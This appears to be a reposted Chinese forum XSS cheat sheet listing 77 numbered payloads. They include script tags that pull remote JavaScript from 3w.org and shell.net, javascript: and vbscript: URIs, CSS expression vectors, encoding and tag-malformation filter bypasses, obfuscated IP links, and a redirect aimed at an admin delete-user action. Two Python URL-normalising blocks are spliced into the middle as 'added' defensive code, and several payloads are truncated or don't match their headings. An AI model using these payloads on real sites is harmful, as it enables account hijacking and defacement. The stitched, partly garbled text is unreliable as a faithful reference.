It seems there is not much XSS material on t00ls, so when I saw something good I copied it over; not sure whether any of you need to bookmark it.
(1) Plain XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
(2) IMG tag XSS using a JavaScript command
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
(3) IMG tag with no semicolons and no quotes
<IMG SRC=javascript:alert('XSS')>
(4) IMG tag, case insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>
(5) HTML entity encoding (semicolons required)
<IMG SRC=javascript:alert("XSS")>
(6) Malformed IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
(7) fromCharCode (calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
(8) UTF-8 Unicode encoding (calculator)
<IMG SRC=jav..omitted..S')>
(9) 7-bit UTF-8 Unicode encoding without semicolons (calculator)
<IMG SRC=jav..omitted..S')>
(10) Hex encoding, also without semicolons (calculator)
<IMG SRC=java..omitted..XSS')>
(11) Embedded tab, splitting up the JavaScript
<IMG SRC="jav ascript:alert('XSS');">
(12) Embedded encoded tab, splitting up the JavaScript
<IMG SRC="jav ascript:alert('XSS');">
(13) Embedded newline
<IMG SRC="jav ascript:alert('XSS');">
(14) Embedded carriage return
<IMG SRC="jav ascript:alert('XSS');">
(15) Multiline JavaScript injection with embedded characters, an extreme XSS example
<IMG SRC="javascript:alert('XSS')">
(16) Working around character limits (the pieces must be on the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>
12-7-1 T00LS - Powered by Discuz! Board
https://www.t00ls.net/viewthread ... table&tid=15267 2/6
(17) Null character
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out
(18) Null character 2. Null characters are basically ineffective in China, because there is nowhere to make use of them.
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out
(19) IMG tag with spaces and meta characters before the JavaScript
<IMG SRC=" javascript:alert('XSS');">
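As an added defensive example (not from this post or from the cheat sheet it copies), the Python normaliser below applies the same steps a browser takes on an attribute URL before it picks a protocol handler, so the case, entity, tab/newline/CR, NUL and leading-space variants in (3)-(19) above all collapse to the same javascript scheme and can be rejected by a single allowlist check. SCRIPT_SCHEMES, the allowlist in safe_href and the function names are my assumptions, not anything from the page.

```python
import html
import re
from typing import Optional

# Schemes whose navigation runs code in the page's origin. This set is an
# assumption for the example; the vectors above use javascript: and vbscript:.
SCRIPT_SCHEMES = {"javascript", "vbscript"}

# Browsers delete TAB, LF and CR anywhere in a URL before parsing it
# (vectors 11-14); NUL is included because vector 17 relies on it being ignored.
_STRIP_ANYWHERE = re.compile(r"[\t\n\r\x00]")
# Leading and trailing C0 controls and spaces are trimmed (vectors 19 and 47).
_TRIM_EDGES = re.compile(r"^[\x00-\x20]+|[\x00-\x20]+$")


def canonical_scheme(value: str) -> Optional[str]:
    """Return the lowercase scheme a browser would see in an attribute value.

    The steps mirror what happens before a protocol handler is chosen:
    1. decode character references, with or without a trailing ';'
       (vectors 5 and 8-10, and the encoded tab of vector 12);
    2. trim leading/trailing control characters and spaces;
    3. delete TAB/LF/CR/NUL anywhere in the string;
    4. lowercase the text before the first ':' (vector 4).
    Returns None when there is no scheme, i.e. the value is a relative URL.
    """
    decoded = html.unescape(value)
    decoded = _TRIM_EDGES.sub("", decoded)
    decoded = _STRIP_ANYWHERE.sub("", decoded)
    match = re.match(r"([A-Za-z][A-Za-z0-9+.\-]*):", decoded)
    return match.group(1).lower() if match else None


def is_script_url(value: str) -> bool:
    """True when the value would run script as a SRC, HREF or url() target."""
    return canonical_scheme(value) in SCRIPT_SCHEMES


def safe_href(value: str) -> str:
    """Allowlist filter for user-supplied links (policy assumed for the
    example): keep http, https, mailto and relative URLs, replace the rest."""
    scheme = canonical_scheme(value)
    if scheme is None or scheme in {"http", "https", "mailto"}:
        return value
    return "about:blank"
```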
(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>
(21) Non-alpha-non-digit XSS, part 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
(22) Non-alpha-non-digit XSS, part 3
<SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>
(23) Doubled open brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>
(24) No closing script tag (Firefox and similar browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
(25) No closing script tag 2
<SCRIPT SRC=//3w.org/XSS/xss.js>
(26) Half-open HTML/JavaScript XSS
<IMG SRC="javascript:alert('XSS')"
(27) Doubled open angle brackets
<iframe src=http://3w.org/XSS.html <
(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>
(29) Escaping JavaScript escapes
\";alert('XSS');//
(30) End TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
(31) INPUT image
<INPUT SRC="javascript:alert('XSS');">
(32) BODY image
<BODY BACKGROUND="javascript:alert('XSS')">
(33) BODY tag
<BODY('XSS')>
(34) IMG DYNSRC
<IMG DYNSRC="javascript:alert('XSS')">
(35) IMG LOWSRC
<IMG LOWSRC="javascript:alert('XSS')">
(36) BGSOUND
<BGSOUND SRC="javascript:alert('XSS');">
(37) Stylesheet (LINK)
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
(38) Remote stylesheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">
(39) List-style-image
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS
(40) IMG VBScript
<IMG SRC='vbscript:msgbox("XSS")'></STYLE><UL><LI>XSS
(41) META refresh to a URL
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
(42) IFRAME
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
(43) FRAME
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
(44) TABLE
<TABLE BACKGROUND="javascript:alert('XSS')">
(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">
(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
(47) DIV background-image with extra characters appended (1-32&34&39&160&8192-8&13&12288&65279)
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
(48) DIV expression
<DIV STYLE="width: expression(alert('XSS'));">
(49) STYLE attribute with a split-up expression
<IMG STYLE="xss:expression(alert('XSS'))">
(50) Anonymous tag with a STYLE attribute (anything made of an open angle bracket followed by a letter)
<XSS STYLE="xss:expression(alert('XSS'))">
(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
(52) IMG STYLE with expression
exppression(alert("XSS"))'>
(53) STYLE background
<STYLE><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
(54) BASE
<BASE HREF="javascript:alert('XSS');//">
(55) EMBED tag: you can embed a Flash movie that contains the XSS
<EMBED SRC="http://3w.org/XSS/xss.swf" ></EMBED>
(56) Using ActionScript inside Flash to smuggle in your XSS code
a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval(a+b+c+d);
(57) XML namespace; the .HTC file must be on the same server as your XSS vector
<HTML xmlns:xss>
<?import namespace="xss" implementation="http://3w.org/XSS/xss.htc">
<xss:xss>XSS</xss:xss>
</HTML>
(58) If your JS is filtered, you can put the JS code inside an image and use that
<SCRIPT SRC=""></SCRIPT>
(59) IMG embedded command; can execute arbitrary commands
<IMG SRC="http://www.XXX.com/a.php?a=b">
(60) IMG embedded command (a.jpg on the same server)
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
(61) Bypassing symbol filtering
<SCRIPT a=">" SRC="http://3w.org/xss.js"></SCRIPT>
(62)
<SCRIPT =">" SRC="http://3w.org/xss.js"></SCRIPT>
(63)
<SCRIPT a=">" " SRC="http://3w.org/xss.js"></SCRIPT>
(64)
<SCRIPT "a='>'" SRC="http://3w.org/xss.js"></SCRIPT>
(65)
<SCRIPT a=`>` SRC="http://3w.org/xss.js"></SCRIPT>
(66)
<SCRIPT a=">'>" SRC="http://3w.org/xss.js"></SCRIPT>
(67)
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://3w.org/xss.js"></SCRIPT>
(68) URL evasion
<A HREF="http://127.0.0.1/">XSS</A>
(69) URL encoding
<A HREF="http://3w.org">XSS</A>
(70) Decimal (dword) IP
<A HREF="http://3232235521">XSS</A>
(71) Hex IP
<A HREF="http://0xc0.0xa8.0x00.0x01">XSS</A>
(72) Octal IP
<A HREF="http://0300.0250.0000.0001">XSS</A>
(73) Mixed encoding
<A HREF="h
tt p://6 6.000146.0x7.147/">XSS</A>
(74) Dropping [http:]
<A HREF="//www.google.com/">XSS</A>
(75) Dropping [www]
<A HREF="http://google.com/">XSS</A>
(76) Absolute DNS with a trailing dot
<A HREF="http://www.google.com./">XSS</A>
(77) javascript: link
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>
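As an added example (not part of this post or of the cheat sheet it copies), this Python host canonicaliser reproduces the WHATWG URL IPv4 host parsing so that the dword, hex, octal and mixed forms in (70)-(73), the trailing-dot host in (76) and the scheme-relative link in (74) all compare equal to a plain dotted-decimal address or lowercase hostname before a link allowlist or blocklist is consulted. It generalises beyond the page's cases to any IPv4 literal with one to four dotted parts; the function names are mine.

```python
import re
from typing import Optional
from urllib.parse import urlsplit


def _ipv4_number(part: str) -> Optional[int]:
    """One dotted part as WHATWG reads it: 0x is hex, a leading 0 octal, else decimal."""
    if part[:2] in ("0x", "0X"):
        digits, base = part[2:] or "0", 16   # a bare "0x" counts as zero
    elif len(part) > 1 and part[0] == "0":
        digits, base = part[1:], 8
    else:
        digits, base = part, 10
    if not re.fullmatch(r"[0-9a-fA-F]+" if base == 16 else r"[0-9]+", digits):
        return None                 # rejects "", signs, "_" and "0o" prefixes
    try:
        return int(digits, base)    # octal digits 8 and 9 fail here
    except ValueError:
        return None


def ipv4_from_host(host: str) -> Optional[int]:
    """32-bit address for an IPv4 literal (dword, hex, octal or mixed; vectors 70-73), else None."""
    parts = host.split(".")
    if len(parts) > 1 and parts[-1] == "":
        parts.pop()                 # trailing dot, as in vector 76
    if not 1 <= len(parts) <= 4:
        return None
    numbers = [_ipv4_number(p) for p in parts]
    # Every part must parse; all but the last fit a byte, the last absorbs the rest.
    if (None in numbers or any(n > 255 for n in numbers[:-1])
            or numbers[-1] >= 256 ** (5 - len(numbers))):
        return None
    addr = numbers[-1]
    for i, n in enumerate(numbers[:-1]):
        addr += n << (8 * (3 - i))
    return addr


def canonical_host(url: str) -> Optional[str]:
    """Host as a browser resolves it: lowercase, no trailing dot, IPv4 literals
    as dotted decimal. Scheme-relative links (vector 74) are treated as http."""
    cleaned = re.sub(r"[\t\n\r]", "", url).strip()   # TAB/LF/CR are deleted (vector 73)
    if cleaned.startswith("//"):
        cleaned = "http:" + cleaned
    host = urlsplit(cleaned).hostname   # lowercased, port and userinfo removed
    if not host:
        return None
    addr = ipv4_from_host(host)
    if addr is None:
        return host.rstrip(".")
    return ".".join(str((addr >> shift) & 0xFF) for shift in (24, 16, 8, 0))
```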
Original source: http://fuzzexp.org/u/0day/?p=141